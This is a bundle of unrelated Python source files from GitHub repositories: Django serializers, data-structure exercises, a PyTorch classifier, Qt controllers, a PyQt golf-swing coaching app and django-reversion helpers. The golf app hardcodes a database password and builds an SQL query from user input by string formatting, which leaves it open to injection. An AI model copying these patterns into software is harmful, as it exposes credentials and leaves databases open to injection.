calendarId=self.calendarId,
eventId=eventId).execute()
return(res)
def get_event(self, eventId):
""" get an event: useful for testing successful delete"""
res = self.cal.events().get(
calendarId=self.calendarId,
eventId=eventId).execute()
return(res)
def move_event(self, eventId):
"""move event to different calendar we have a 'backCalID' in config"""
if self.backCalID is None:
raise Exception("No backCalID in config, but trying to move")
print("moving %s to %s" % (eventId, self.backCalID))
res = self.cal.events().move(
calendarId=self.calendarId,
eventId=eventId,
destination=self.backCalID).execute()
return(res)
| LabNeuroCogDevel/LNCDcal.py | LNCDcal/LNCDcal.py | LNCDcal.py | py | 6,453 | python | en | code | 0 | github-code | 36 |
11936779128 | #import ipdb
import logging
from typing import Optional, cast
from rest_framework import serializers
from rest_framework.exceptions import APIException, ErrorDetail, ValidationError
from rest_flex_fields.serializers import FlexFieldsSerializerMixin
from ..exception.unprocessable_entity import UnprocessableEntity
from ..models import *
from .name_and_uuid_serializer import NameAndUuidSerializer
from .embedded_id_validating_serializer_mixin import (
EmbeddedIdValidatingSerializerMixin
)
from .group_setting_serializer_mixin import GroupSettingSerializerMixin
from .workflow_task_instance_serializer import WorkflowTaskInstanceSerializer
from .workflow_transition_serializer import WorkflowTransitionSerializer
from .workflow_execution_serializer import WorkflowExecutionSummarySerializer
logger = logging.getLogger(__name__)
COMMON_FIELDS = [
'url', 'uuid', 'name', 'description', 'dashboard_url',
'schedule', 'max_concurrency',
'max_age_seconds', 'default_max_retries',
'max_postponed_failure_count', 'max_postponed_missing_execution_count',
'max_postponed_timeout_count',
'min_missing_execution_delay_seconds',
'postponed_failure_before_success_seconds',
'postponed_missing_execution_before_start_seconds',
'postponed_timeout_before_success_seconds',
'scheduled_instance_count',
'should_clear_failure_alerts_on_success',
'should_clear_timeout_alerts_on_success',
'latest_workflow_execution',
'created_by_user', 'created_by_group',
'run_environment',
'enabled',
'created_at', 'updated_at'
]
COMMON_READ_ONLY_FIELDS = [
'url', 'uuid', 'dashboard_url',
'latest_workflow_execution',
'created_by_user', 'created_by_group',
'created_at', 'updated_at'
]
class WorkflowSummarySerializer(GroupSettingSerializerMixin,
serializers.HyperlinkedModelSerializer):
"""
Selected properties of Workflows.
"""
class Meta:
model = Workflow
fields = COMMON_FIELDS
read_only_fields = COMMON_READ_ONLY_FIELDS
latest_workflow_execution = WorkflowExecutionSummarySerializer(
required=False, allow_null=True, read_only=True)
url = serializers.HyperlinkedIdentityField(
view_name='workflows-detail',
lookup_field='uuid'
)
class WorkflowSerializer(
EmbeddedIdValidatingSerializerMixin,
FlexFieldsSerializerMixin,
WorkflowSummarySerializer):
"""
Workflows are Tasks arranged in a directed graph. Configured Tasks
are held by WorkflowTaskInstances, and WorkflowTransitions connect
WorkflowTaskInstances together.
"""
NEW_UUID_PREFIX = 'NEW_'
class Meta:
model = Workflow
fields = COMMON_FIELDS + [
'alert_methods', 'workflow_task_instances',
'workflow_transitions',
]
read_only_fields = COMMON_READ_ONLY_FIELDS
workflow_task_instances = WorkflowTaskInstanceSerializer(
many=True, read_only=True)
workflow_transitions = WorkflowTransitionSerializer(many=True, read_only=True)
alert_methods = NameAndUuidSerializer(include_name=True,
view_name='alert_methods-detail', many=True, required=False)
def to_internal_value(self, data):
logger.info(f"wfs: to_internal value, data = {data}")
workflow: Optional[Workflow] = cast(Workflow, self.instance) if self.instance else None
data['description'] = data.get('description') or ''
data['schedule'] = data.get('schedule') or ''
data.pop('latest_workflow_execution', None)
validated = super().to_internal_value(data)
validated['workflow_task_instances'] = data.get('workflow_task_instances')
validated['workflow_transitions'] = data.get('workflow_transitions')
logger.debug(f"wfs: to_internal value, validated = {validated}")
run_environment = validated.get('run_environment',
workflow.run_environment if workflow else None)
self.set_validated_alert_methods(data=data, validated=validated,
run_environment=run_environment,
allow_any_run_environment=(run_environment is None))
return validated
def create(self, validated_data):
return self.create_or_update(None, validated_data)
def update(self, instance, validated_data):
return self.create_or_update(instance, validated_data)
def create_or_update(self, instance, validated_data):
defaults = validated_data
alert_methods = defaults.pop('alert_methods', None)
wtis = defaults.pop('workflow_task_instances', None)
wts = defaults.pop('workflow_transitions', None)
if instance:
super().update(instance, defaults)
workflow = instance
else:
defaults.pop('uuid', None)
workflow = Workflow(**defaults)
workflow.save()
if alert_methods is not None:
workflow.alert_methods.set(alert_methods)
if wtis is None:
return workflow
old_wtis_by_uuid = {}
old_wtis_by_name = {}
for wti in workflow.workflow_task_instances.select_related(
'task__run_environment').all():
old_wtis_by_uuid[str(wti.uuid)] = wti
old_wtis_by_name[wti.name] = wti
new_wtis_by_uuid = {}
new_wtis_by_name = {}
for wti_dict in wtis:
wti_uuid = wti_dict.get('uuid')
if wti_uuid:
new_wtis_by_uuid[wti_uuid] = wti_dict
else:
wti_name = wti_dict.get('name')
if wti_name is None:
raise ValidationError({
'workflow_task_instances': [
ErrorDetail('Workflow Task Instance missing uuid and name', code='invalid')
]
})
new_wtis_by_name[wti_name] = wti_dict
for wti_uuid, wti in old_wtis_by_uuid.items():
if (wti_uuid not in new_wtis_by_uuid) and (wti.name not in new_wtis_by_name):
wti.delete()
logger.info(f"old_wtis_by_uuid = {old_wtis_by_uuid}")
old_wts_by_uuid = {}
for wt in workflow.workflow_transitions().all():
old_wts_by_uuid[str(wt.uuid)] = wt
for wti_dict in wtis:
wti_uuid = wti_dict.pop('uuid', None)
wti_name = wti_dict.get('name')
existing_wti = None
if wti_uuid:
if not wti_uuid.startswith(self.NEW_UUID_PREFIX):
existing_wti = old_wtis_by_uuid.get(wti_uuid)
if existing_wti is None:
raise ValidationError({
'workflow_task_instances': [
ErrorDetail(f'Workflow Task Instance with UUID {wti_uuid} is not part of Workflow',
code='invalid')
]
})
logger.info(f"Found existing WTI with UUID {wti_uuid}")
elif wti_name:
existing_wti = old_wtis_by_name.get(wti_name)
if existing_wti is None:
raise ValidationError({
'workflow_task_instances': [
ErrorDetail(f"Workflow Task Instance with name '{wti_name}' is not part of Workflow",
code='invalid')
]
})
ser = WorkflowTaskInstanceSerializer(instance=existing_wti, data=wti_dict,
partial=True, context=self.context, workflow=workflow,
for_embedded_deserialization=True)
try:
if not ser.is_valid():
msg = f"Error saving Workflow Task Instance with UUID {wti_uuid or '[Empty]'}, name '{wti_name or '[Empty]'}'"
logger.error(msg)
# ser.errors results in ValueError: Too many values to unpack
#errors = [error_detail.string for error_detail in ser.errors]
raise serializers.ValidationError({
'workflow_task_instances': [msg]
})
except serializers.ValidationError as ve:
logger.exception('workflow serializer validation error')
raise serializers.ValidationError({
'workflow_task_instances': [str(ve)]
}) from ve
except UnprocessableEntity as ue:
raise UnprocessableEntity({
'workflow_task_instances': [str(ue)]
}) from ue
except APIException as api_ex:
raise APIException({
'workflow_task_instances': [str(api_ex)]
}) from api_ex
saved_wti = ser.save(workflow=workflow)
if wti_uuid and wti_uuid.startswith(self.NEW_UUID_PREFIX):
new_wtis_by_uuid[wti_uuid] = saved_wti
if wts is None:
# FIXME: handle case when transitions are not resent
logger.info('Workflow Transitions not set')
else:
for wt_dict in wts:
wt_uuid = wt_dict.pop('uuid', None)
existing_wt = None
if wt_uuid and not wt_uuid.startswith(self.NEW_UUID_PREFIX):
existing_wt = old_wts_by_uuid.pop(wt_uuid, None)
if existing_wt is None:
raise ValidationError({
'workflow_task_instances': [
ErrorDetail(f'Workflow Transition with UUID {wt_uuid} is not part of Workflow',
code='invalid')
]
})
from_wti_dict = wt_dict.get('from_workflow_task_instance', None)
if from_wti_dict:
wti_uuid = from_wti_dict['uuid']
if wti_uuid.startswith(self.NEW_UUID_PREFIX):
from_wti_dict['uuid'] = str(new_wtis_by_uuid[wti_uuid].uuid)
to_wti_dict = wt_dict.get('to_workflow_task_instance', None)
if to_wti_dict:
wti_uuid = to_wti_dict['uuid']
if wti_uuid.startswith(self.NEW_UUID_PREFIX):
to_wti_dict['uuid'] = str(new_wtis_by_uuid[wti_uuid].uuid)
if existing_wt:
ser = WorkflowTransitionSerializer(existing_wt, data=wt_dict, context=self.context)
else:
ser = WorkflowTransitionSerializer(data=wt_dict, context=self.context)
ser.is_valid(raise_exception=True)
ser.save()
WorkflowTransition.objects.filter(uuid__in=old_wts_by_uuid.keys()).delete()
return workflow
| CloudReactor/task_manager | server/processes/serializers/workflow_serializer.py | workflow_serializer.py | py | 10,948 | python | en | code | 0 | github-code | 36 |
12704443162 | def pre_ordem(pont):
if (pont != None):
print(pont.valor)
pre_ordem(pont.esq)
pre_ordem(pont.dir)
def em_ordem(pont):
if (pont != None):
em_ordem(pont.esq)
print(pont.valor)
em_ordem(pont.dir)
def pos_ordem(pont):
if (pont != None):
pos_ordem(pont.esq)
pos_ordem(pont.dir)
print(pont.valor)
# Para testar
class No:
def __init__(self):
self.valor = None
self.esq = None
self.dir = None
raiz = No()
raiz.valor = 20
elemento1 = No()
elemento1.valor = 10
raiz.esq = elemento1
elemento2 = No()
elemento2.valor = 5
elemento1.esq = elemento2
elemento3 = No()
elemento3.valor = 40
raiz.dir = elemento3
elemento4 = No()
elemento4.valor = 30
elemento3.esq = elemento4
elemento5 = No()
elemento5.valor = 50
elemento3.dir = elemento5
pre_ordem(raiz)
em_ordem(raiz)
pos_ordem(raiz)
| GabrielReira/EDA-UFBA | 09.py | 09.py | py | 830 | python | pt | code | 0 | github-code | 36 |
41357846970 | "JIAHAO CHEN 89"
class SNode:
def __init__(self, e, next=None):
self.elem = e
self.next = next
class MySList():
def __init__(self):
self._head = None
self._tail = None
def __str__(self):
"""Returns a string with the elements of the list"""
###This functions returns the same format used
###by the Python lists, i.e, [], ['i'], ['a', 'b', 'c', 'd']
###[1], [3, 4, 5]
nodeIt = self._head
result = '['
while nodeIt:
result += str(nodeIt.elem) + ", "
nodeIt = nodeIt.next
if len(result) > 1:
result = result[:-2]
result += ']'
return result
def append(self, e):
"""Adds a new element, e, at the end of the list"""
# create the new node
newNode = SNode(e)
# the last node must point to the new node
# now, we must update the tail reference
if self._head == None:
self._head = newNode
else:
self._tail.next = newNode
self._tail = newNode
def isSorted(self):
"returns True if self is sorted"
if self._head == None:
return True
else:
node1 = self._head
node2 = node1.next
while node2:
if node1.elem > node2.elem:
return False
node1 = node2
node2 = node2.next
return True
def merge(self, other):
"""
1º check if both lists are ordered or not. If not -> return None
2º Remove duplicate of both lists
3º merge them
"""
yes1 = False
yes2 = False
if self._head != None:
node1 = self._head
# check if the list is ordered
while node1.next:
if node1.next.elem > node1.elem:
node1 = node1.next
elif node1.next.elem == node1.elem: # if duplicate, remove them
node1.next = node1.next.next
else:
return None # the list is not ordered
yes1 = True
if other._head != None:
node2 = other._head
# check if the second list is ordered
while node2.next:
if node2.next.elem > node2.elem:
node2 = node2.next
elif node2.next.elem == node2.elem: # if duplicate, remove them
node2.next = node2.next.next
else:
return None # the list is not ordered
yes2 = True
if yes1 and yes2:
# merge both lists
sl = MySList()
node1 = self._head
node2 = other._head
inode = None
while node1 and node2:
if node1.elem < node2.elem:
if sl._head == None:
sl._head = node1
inode = sl._head
else:
inode.next = node1
inode = inode.next
node1 = node1.next
elif node1.elem > node2.elem:
if sl._head == None:
sl._head = node2
inode = sl._head
else:
inode.next = node2
inode = inode.next
node2 = node2.next
elif node1.elem == node2.elem:
if sl._head == None:
sl._head = node1
inode = sl._head
else:
inode.next = node1
inode = inode.next
node1 = node1.next
node2 = node2.next
if node1:
if inode.elem < node1.elem:
inode.next = node1
elif node2:
if inode.elem < node2.elem:
inode.next = node2
return sl
elif yes1:
return self
elif yes2:
return other
else:
return self
...
import random
if __name__ == '__main__':
# Please, uncomment the code for test each function
l2 = MySList()
for i in range(10):
l2.append(random.randint(0, 20))
print(l2)
l3 = MySList()
for i in range(10):
l3.append(i)
print('l2:', str(l2))
print('l3:', str(l3))
print("List merged:", str(l2.merge(l3)))
print("List merged:", str(l3.merge(l2)))
data = []
for i in range(5):
x = random.randint(0, 10)
if x not in data:
data.append(x)
data.sort()
l2 = MySList()
for x in data:
l2.append(x)
data = []
for i in range(7):
x = random.randint(0, 10)
if x not in data:
data.append(x)
data.sort()
l3 = MySList()
for x in data:
l3.append(x)
print('l2:', str(l2))
print('l3:', str(l3))
print("List merged:", str(l2.merge(l3)))
print("List merged:", str(l3.merge(l2)))
| J-H-C-037/Subject-EDA | EDA/partial1pastexamsEDA/partial_84.py | partial_84.py | py | 5,172 | python | en | code | 0 | github-code | 36 |
20145975874 | import torch.nn as nn
# define small classifier
class MlpClassifier(nn.Module):
""" Simple classifier """
def __init__(self, args, n_classes, pretrain_stage_config):
super(MlpClassifier, self).__init__()
self.input_size = int(args['pretrain_output_size'] * args['seq_length'])
self.hidden_dim1 = 512
self.hidden_dim2 = 256
self.freeze = not args['finetuning']
self.fc1 = nn.Linear(in_features=self.input_size, out_features=self.hidden_dim1)
self.fc2 = nn.Linear(in_features=self.hidden_dim1, out_features=self.hidden_dim2)
self.fc3 = nn.Linear(in_features=self.hidden_dim2, out_features=n_classes)
def forward(self, src):
batch_size = src.size(0)
if self.freeze:
# detach src
src1 = src.data
else:
src1 = src
src2 = src1.reshape(batch_size, -1)
src3 = nn.functional.relu(self.fc1(src2))
src4 = nn.functional.relu(self.fc2(src3))
out = self.fc3(src4)
return out
| antonior92/physionet-12ecg-classification | models/mlp.py | mlp.py | py | 1,046 | python | en | code | 6 | github-code | 36 |
70887541225 | #!/usr/bin/env python
# coding: utf-8
# Leet Code problem: 19
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:
# Get the length of the linked list
curr = head
stack = []
while curr:
stack.append(curr)
curr = curr.next
# Populate the new linked list, skiping the n node
new = ListNode(None)
tmp = new
curr = head
i = 0
while curr:
nextp = curr.next
if i == (len(stack) - n):
tmp2 = curr.next
tmp.next = tmp2
else:
tmp.next = curr
tmp = tmp.next
curr = nextp
i += 1
return new.next
# Slower but cleaner solution
# class Solution:
# def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:
# dummy=ListNode(-1,head)
# # pointers
# fast = head
# slow = dummy
# # Get fast to n
# for i in range(n-1):
# fast=fast.next
# # Move forward until fast reaches None
# while fast.next:
# fast=fast.next
# slow=slow.next
# # Remove the n (from last) node
# slow.next=slow.next.next
# return dummy.next | jwilliamn/trenirovka-code | leetc_19.py | leetc_19.py | py | 1,536 | python | en | code | 0 | github-code | 36 |
73933034022 | import sys
import datetime
import socket, time
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import *
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import QTimer, QTime
from PyQt5.QtCore import pyqtSignal, QObject
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5 import uic
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QByteArray, QSettings, QTimer, pyqtSlot
from PyQt5.QtWidgets import QWidget, QApplication, QLabel, QSizePolicy, QVBoxLayout, QAction, QPushButton, QLineEdit
from PyQt5.QtGui import QMovie
from time import sleep
import main as m
import Python_to_Linux as PtoL
import cv2
import threading
import serial
import numpy as np
import math
import statistics
import os
import sys
import pymysql
import base64
import requests
cam0 = cv2.VideoCapture(2)
cam1 = cv2.VideoCapture(0)
arduino = serial.Serial('/dev/ttyACM0', 115200)
print("camera on")
ar_flag = 0
Impact_frame=0
cnt=0
id_text =""
light_stop=False
######################################## light thread
class lightThread(threading.Thread):
def __init__(self, end, stop):
threading.Thread.__init__(self)
self.end = end
self.stop = stop
def __del__(self):
print("del")
def run(self):
ligth(self.end, self.stop)
def ligth(end, stop):
youngsun =1
while youngsun:
if stop():
print("stop hihi")
break
f=arduino.readline()
f=f.decode()
if f == 'Impact\r\n':
end.light_signal.emit()
break
####################################### cam 녹화 스레드
class camThread(threading.Thread):
success = 0
def __init__(self, previewName, camID, cam):
threading.Thread.__init__(self)
self.previewName = previewName
self.camID = camID
self.cam = cam
def run(self):
self.success = camPreview(self.previewName, self.camID, self.cam)
def camPreview(previewName, camID, cam):
global cnt
cam.set(3,640)
cam.set(4,480)
##
#frame_width=int(cam.get(3))
#frame_height=int(cam.get(4))
##
fps = 30
out = cv2.VideoWriter('./examples/media/'+ str(previewName)+'.avi',cv2.VideoWriter_fourcc('M','J','P','G'), fps, (640,480))
if camID==0:
cnt = 0
start_time = datetime.datetime.now()
end_time = start_time + datetime.timedelta(seconds=8)
while(True):
if camID==0:
cnt+=1
ret, frame = cam.read()
if ret:
out.write(frame)
if end_time < datetime.datetime.now():
out.release()
print("recoding success "+str(previewName))
return 1
else:
print("error "+str(previewName))
return 5
def impact_fram(cnt):
global Impact_frame
print(cnt)
Impact_frame=cnt
####################################### interrupt 만들기
class Communicate(QObject):
end_signal = pyqtSignal()
cam_signal = pyqtSignal()
main_signal = pyqtSignal()
light_signal = pyqtSignal()
take_signal = pyqtSignal()
top_signal = pyqtSignal()
impact_signal = pyqtSignal()
youngseon = pyqtSignal()
####################################### 영상 재생 스레드
class Video(threading.Thread):
def __init__(self, ui, previewName, labelName, width, height, re, stop, end):
threading.Thread.__init__(self)
self.previewName = previewName
self.labelName = labelName
self.ui = ui
self.width = width
self.height = height
self.re = re
self.stop = stop
self.end = end
def run(self):
VideoPlayer(self.ui, self.previewName, self.labelName, self.width, self.height, self.re, self.stop, self.end)
def VideoPlayer(ui, previewName, label, width, height, re, stop, end):
marker_cnt=0
global ar_flag
while True:
cap = cv2.VideoCapture(previewName)
if stop():
break
if re ==3 :
while ar_flag == 0 :
a=arduino.readline()
a=a.decode()
if a == 'Start\r\n':
ar_flag = 1
end.cam_signal.emit()
while True:
if re == 0:
if ar_flag == 1:
break
else:
pass
elif re == 9:
marker_cnt +=1
label.ret, label.frame = cap.read()
if label.ret:
label.rgbImage = cv2.cvtColor(label.frame, cv2.COLOR_BGR2RGB)
label.convertToQtFormat = QImage(label.rgbImage.data, label.rgbImage.shape[1],
label.rgbImage.shape[0], QImage.Format_RGB888)
label.pixmap = QPixmap(label.convertToQtFormat)
label.p = label.pixmap.scaled(width, height, QtCore.Qt.IgnoreAspectRatio)
label.setPixmap(label.p)
label.update()
if re == 9:
if marker_cnt == math.floor(m.point[1]*3): #takeaway지점
end.take_signal.emit()
elif marker_cnt == math.floor(m.point[3]*3): #top지점
end.top_signal.emit()
elif marker_cnt == math.floor(m.point[4]*3): #impact지점
end.impact_signal.emit()
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(25, loop.quit)
loop.exec_()
else:
break
if stop():
break
cap.release()
if re == 0 or re == 3:
break
else:
pass
if re == 3:
end.end_signal.emit()
def camera(end):
global light_stop
light_stop=False
cam_t1 = camThread("Camera1", 0, cam0)
cam_t2 = camThread("Camera2", 1, cam1)
light = lightThread(end, lambda: light_stop)
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(3000, loop.quit)
loop.exec_()
cam_t1.start()
cam_t2.start()
light.start()
return light
def young(light):
light.quit()
########################################## 피드백 스레드
class MainThread(threading.Thread):
success = 0
def __init__(self,end):
threading.Thread.__init__(self)
self.end = end
def run(self):
main_run(self.end)
def main_run(end):
global id_text
global Impact_frame
PtoL.JSONmaker()
m.main(Impact_frame, id_text)
end.main_signal.emit()
########################################### main GUI
gifFile = "loading.gif"
class MyWindow_step(QMainWindow):
def __init__(self, gifFile):
super().__init__()
self.gifFile = gifFile
self.GUI_login()
#self.GUI_all()
def GUI_login(self):
self.ui = uic.loadUi('Designer_login.ui')
self.ui.show()
self.ui.LoginButton.clicked.connect(lambda : self.LoginDB(self.ui))
def LoginDB(self,a):
global id_text
id_text = a.UserID.text()
try:
#send db -> response 200
conn = pymysql.connect("db-ladybug.cmghyay3tpvl.ap-northeast-2.rds.amazonaws.com",user="ladybug",passwd = "ladybug456123",db="AppService", port=3306,use_unicode=True,charset ='utf8')
cursor = conn.cursor()
query = """SELECT * FROM AppService.MEMBER WHERE user_id = '{0}';""".format(id_text)
cursor.execute(query)
result = cursor.fetchall()
conn.commit()
asdf=()
if result == asdf:
a.UserID.setText("Please Sign up in application")
else:
self.GUI_all()
except:
#respose 404
print("server not connect")
intro_stop = False
swing_stop = False
def GUI_all(self):
self.ui = uic.loadUi('Designer_all.ui')
#print("all"+str(threading.active_count()))
self.ui.loadinglabel_2.hide()
global ar_flag
global intro_stop
global swing_stop
global cnt
global light_stop
light_stop=False
ar_flag = 0
self.end = Communicate()
intro_stop = False
swing_stop = False
intro_thread = Video(self.ui,"golf_animation_intro.avi", self.ui.video_label, 1920, 1080, 0, lambda: intro_stop, self.end)
swing_thread = Video(self.ui,"golf_animation_swing.avi", self.ui.video_label, 1920, 1080, 3, lambda: swing_stop, self.end)
intro_thread.daemon = True
swing_thread.daemon = True
intro_thread.start()
swing_thread.start()
self.ui.show()
light = self.end.cam_signal.connect(lambda: camera(self.end))
self.end.light_signal.connect(lambda: impact_fram(cnt))
self.end.end_signal.connect(self.GUI_loading)
self.end.youngseon.connect(lambda: young(light))
def GUI_loading(self):
self.ui.loadinglabel_2.show()
print("loding" + str(threading.active_count()))
self.end = Communicate()
self.movie = QMovie(self.gifFile, QByteArray(), self)
self.movie.setCacheMode(QMovie.CacheAll)
self.ui.loadinglabel.setMovie(self.movie)
self.movie.start()
self.movie.loopCount()
global Impact_frame
if Impact_frame==0:
self.GUI_fakeswing(self.end)
return
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(3000, loop.quit)
loop.exec_()
main_Thread = MainThread(self.end)
main_Thread.daemon = True
main_Thread.start()
self.end.main_signal.connect(self.GUI_feedback)
def GUI_fakeswing(self,end):
end.youngseon.emit()
print(threading.active_count())
global intro_stop
global swing_stop
global light_stop
light_stop=True
print(threading.active_count())
intro_stop=True
print(threading.active_count())
swing_stop=True
print(threading.active_count())
self.ui = uic.loadUi('Designer_fakeswing.ui')
self.ui.show()
loop = QtCore.QEventLoop()
QtCore.QTimer.singleShot(3000, loop.quit)
loop.exec_()
self.GUI_all()
marker_stop=False
def GUI_feedback(self):
self.ui = uic.loadUi('Designer_feedback.ui')
self.end = Communicate()
self.ui.show()
self.ui.home.clicked.connect(lambda: self.feedback_clicked(1))
self.ui.replay.clicked.connect(lambda: self.feedback_clicked(2))
self.ui.feedback1.clicked.connect(lambda: self.feedback_clicked(3))
self.ui.feedback2.clicked.connect(lambda: self.feedback_clicked(4))
self.ui.feedback3.clicked.connect(lambda: self.feedback_clicked(5))
def GUI_feedback1(self):
self.ui = uic.loadUi('Designer_feedback1.ui')
self.end = Communicate()
global marker_stop
global intro_stop
global swing_stop
intro_stop = True
swing_stop = True
marker_stop=False
front_thread = Video(self.ui,"Camera1_out.avi", self.ui.front_label, 830, 700, 9, lambda: marker_stop, self.end)
side_thread = Video(self.ui,"Camera2_out.avi", self.ui.side_label, 830, 700, 1, lambda: marker_stop, self.end)
front_thread.daemon=True
side_thread.daemon=True
front_thread.start()
side_thread.start()
self.ui.show()
self.textbox(self.ui.textBrowser,1)
self.end.take_signal.connect(lambda: self.textbox(self.ui.textBrowser,2))
self.end.top_signal.connect(lambda: self.textbox(self.ui.textBrowser,3))
self.end.impact_signal.connect(lambda: self.textbox(self.ui.textBrowser,4))
self.end.impact_signal.connect(lambda: self.textbox(self.ui.textBrowser,0))
self.ui.skip_button.clicked.connect(self.feedback_clicked1)
feedback_stop = False
def GUI_feedback2(self):
self.ui = uic.loadUi('Designer_feedback2.ui')
self.end = Communicate()
global feedback_stop
feedback_stop = False
address_thread = Video(self.ui,"testing1.avi", self.ui.video1, 425, 530, 1, lambda: feedback_stop, self.end)
backswing_thread = Video(self.ui,"testing2.avi", self.ui.video2, 425, 530, 1, lambda: feedback_stop, self.end)
swing_thread = Video(self.ui,"testing3.avi", self.ui.video3, 425, 530, 1, lambda: feedback_stop, self.end)
finish_thread = Video(self.ui,"testing4.avi", self.ui.video4, 425, 530, 1, lambda: feedback_stop, self.end)
address_thread.daemon=True
backswing_thread.daemon=True
swing_thread.daemon=True
finish_thread.daemon=True
address_thread.start()
backswing_thread.start()
swing_thread.start()
finish_thread.start()
self.ui.show()
self.textbox(self.ui.text1,1)
self.textbox(self.ui.text2,2)
self.textbox(self.ui.text3,3)
self.textbox(self.ui.text4,4)
self.ui.backButton.clicked.connect(self.feedback_clicked2)
def GUI_feedback3(self):
self.ui = uic.loadUi('Designer_feedback3.ui')
self.end = Communicate()
global feedback_stop
feedback_stop = False
address_thread = Video(self.ui,"master_out.avi", self.ui.video1, 911, 471, 1, lambda: feedback_stop, self.end)
backswing_thread = Video(self.ui,"pelvis_out.avi", self.ui.video2, 911, 471, 1, lambda: feedback_stop, self.end)
swing_thread = Video(self.ui,"Camera1_master_out.avi", self.ui.video3, 911, 471, 1, lambda: feedback_stop, self.end)
finish_thread = Video(self.ui,"Camera1_pelvis_out.avi", self.ui.video4, 911, 471, 1, lambda: feedback_stop, self.end)
address_thread.daemon=True
backswing_thread.daemon=True
swing_thread.daemon=True
finish_thread.daemon=True
address_thread.start()
backswing_thread.start()
swing_thread.start()
finish_thread.start()
self.ui.show()
self.ui.backButton.clicked.connect(self.feedback_clicked3)
def textbox(self, textBox, text):
if text ==0:
for i, val in enumerate(m.stands):
textBox.append(val)
textBox.show()
elif text ==1:
for i, val in enumerate(m.address_feedback):
textBox.append(val)
textBox.show()
elif text ==2:
for i, val in enumerate(m.backswing_feedback):
textBox.append(val)
textBox.show()
elif text ==3:
for i, val in enumerate(m.swing_feedback):
textBox.append(val)
textBox.show()
elif text ==4:
for i, val in enumerate(m.finish_feedback):
textBox.append(val)
textBox.show()
def feedback_clicked(self,button):
global feedback_stop
feedback_stop = True
self.ui.close()
if button ==1:
self.GUI_login()
elif button ==2:
self.GUI_all()
elif button ==3:
self.GUI_feedback1()
elif button ==4:
self.GUI_feedback2()
elif button ==5:
self.GUI_feedback3()
def feedback_clicked1(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
def feedback_clicked2(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
def feedback_clicked3(self):
global marker_stop
marker_stop=True
self.ui.close()
self.GUI_feedback()
if __name__ == "__main__":
app = QApplication(sys.argv)
myApp_step = MyWindow_step(gifFile)
app.exec_()
| 0sun-creater/golf_swing_coaching_program | python/GUI.py | GUI.py | py | 17,024 | python | en | code | 0 | github-code | 36 |
74218356582 | from PySide6.QtCore import QObject, Property, Slot, Signal, QTimer
from typing import Optional
from .qml_file_wrapper import QmlFileWrapper
class MainController(QObject):
main_content_qml_changed = Signal()
def __init__(self, parent=None):
super().__init__(parent)
self._app = parent
self._qml_wrappers = {
"HOME": QmlFileWrapper('Home.qml'),
"OTHER": QmlFileWrapper('Other.qml')
}
self._active_id = "HOME"
self._active_wrapper: QmlFileWrapper = self._qml_wrappers[self._active_id]
self._counter = 0
self._timer = QTimer()
self._timer.setInterval(10)
self._timer.setSingleShot(False)
self._timer.timeout.connect(self._toggle_screen)
@Property(str, notify=main_content_qml_changed)
def main_content_qml(self) -> str:
return self._active_wrapper.qml_path
def startup(self):
self._timer.start()
def shutdown(self):
print(f"Stopping after {self._counter} iterations.")
@Slot(str, result=QmlFileWrapper)
def get_wrapper_object_by_name(self, screen_name: str) -> Optional[QmlFileWrapper]:
return self._qml_wrappers[screen_name.upper()]
@Slot(str) # QML will only send a string
def go_to_qml_by_name(self, next_id: str) -> None:
self._active_wrapper = self.get_wrapper_object_by_name(next_id)
self.main_content_qml_changed.emit()
def _toggle_screen(self):
self._counter = self._counter + 1
if self._active_id == "HOME":
self._active_id = "OTHER"
else:
self._active_id = "HOME"
self.go_to_qml_by_name(self._active_id)
| maldata/qml-error-test | errortest/main_controller.py | main_controller.py | py | 1,733 | python | en | code | 0 | github-code | 36 |
18879607170 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
Support for django-reversion on models with translatable fields and django-cms
placeholder fields.
"""
from functools import partial
from django.db.models.signals import post_save
from cms.models.pluginmodel import CMSPlugin
from reversion.revisions import (
default_revision_manager, revision_context_manager, VersionAdapter)
# We would like this to not depend on Parler, but still support if it is
# available.
try:
from parler import cache
except:
pass
def _add_to_context(obj, manager=None, context=None):
if manager is None:
manager = default_revision_manager
if context is None:
context = default_revision_manager._revision_context_manager
adapter = manager.get_adapter(obj.__class__)
version_data = adapter.get_version_data(obj)
context.add_to_context(manager, obj, version_data)
def create_revision(obj, user=None, comment=None):
with revision_context_manager.create_revision():
if user:
revision_context_manager.set_user(user)
if comment:
revision_context_manager.set_comment(comment)
_add_to_context(obj)
if hasattr(obj._meta, 'placeholder_field_names'):
add_placeholders_to_revision(instance=obj)
def add_placeholders_to_revision(
instance, revision_manager=None, rev_ctx=None):
"""
Manually add plugins to the revision.
This function is an updated version of
http://github.com/divio/django-cms/blob/develop/cms/utils/helpers.py#L34
but instead of working on pages, works on models with placeholder
fields.
"""
add_to_context = partial(
_add_to_context,
manager=revision_manager,
context=rev_ctx,
)
# Add the placeholder to the revision
for name in instance._meta.placeholder_field_names:
add_to_context(getattr(instance, name))
# Add all plugins to the revision
ph_ids = [getattr(instance, '{0}_id'.format(name))
for name in instance._meta.placeholder_field_names]
for plugin in CMSPlugin.objects.filter(placeholder_id__in=ph_ids):
plugin_instance, _ = plugin.get_plugin_instance()
if plugin_instance:
add_to_context(plugin_instance)
add_to_context(plugin)
class TranslatableVersionAdapterMixin(object):
revision_manager = None
def __init__(self, model):
super(TranslatableVersionAdapterMixin, self).__init__(model)
# If the model is translated with django-parler, register the
# translation model to be tracked as well, by following all placeholder
# fields, if any.
if hasattr(model, '_parler_meta'):
root_model = model._parler_meta.root_model
self.revision_manager.register(root_model)
# Also add the translations to the models to follow.
self.follow = list(self.follow) + [model._parler_meta.root_rel_name]
# And make sure that when we revert them, we update the translations
